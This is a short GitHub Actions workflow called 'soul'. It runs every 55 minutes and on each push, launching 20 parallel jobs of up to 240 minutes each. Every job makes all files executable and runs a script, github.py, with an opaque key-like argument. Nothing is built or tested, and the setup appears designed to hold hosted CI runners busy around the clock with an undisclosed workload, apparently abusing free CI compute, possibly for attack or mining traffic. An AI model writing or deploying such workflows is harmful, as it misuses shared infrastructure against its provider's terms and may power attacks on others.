name: soul

on:
  push:
  pull_request:
  schedule:
    - cron: '*/55 * * * *'
  workflow_dispatch:

jobs:
  build_and_run:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        job: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
          11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
          
    steps:
      - name: Checkout code
        uses: actions/checkout@v4


      - name: Prepare and Run Soul Script ðŸš€
        timeout-minutes: 240 
        run: |
          echo "Starting job ${{ matrix.job }}"
          chmod +x *
          python3 github.py 6236201824bysoulcraclsop
          echo "Job ${{ matrix.job }} finished"
